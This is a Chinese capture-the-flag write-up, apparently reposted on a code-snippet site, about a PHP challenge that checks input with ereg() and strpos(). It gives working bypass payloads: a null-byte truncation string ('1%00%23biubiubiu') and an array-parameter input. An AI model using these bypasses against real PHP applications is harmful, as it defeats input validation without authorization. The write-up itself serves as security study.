/x00

首页 > 代码库 > /x00

2024-09-27 04:05:39 218人阅读

view-source:

    if (isset ($_GET[‘nctf‘])) {
        if (@ereg ("^[1-9]+$", $_GET[‘nctf‘]) === FALSE)
            echo ‘必须输入数字才行‘;
        else if (strpos ($_GET[‘nctf‘], ‘#biubiubiu‘) !== FALSE)   
            die(‘Flag: ‘.$flag);
        else
            echo ‘骚年，继续努力吧啊~‘;
    }

这是源码
nctf这是php的接受值
(@ereg ("^[1-9]+$", $_GET[‘nctf‘]) === FALSE
规定此值内必须有数字
strpos ($_GET[‘nctf‘], ‘#biubiubiu‘
规定此值内含有#biubiubiu‘
看似矛盾
所以这里用%00进行字符串的截断
?nctf=1%00%23biubiubiu

得到flag

如：nctf[]=1.#biubiubiu

/x00

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > /x00

/x00

看完仍有疑问？有类似问题直接问程序猿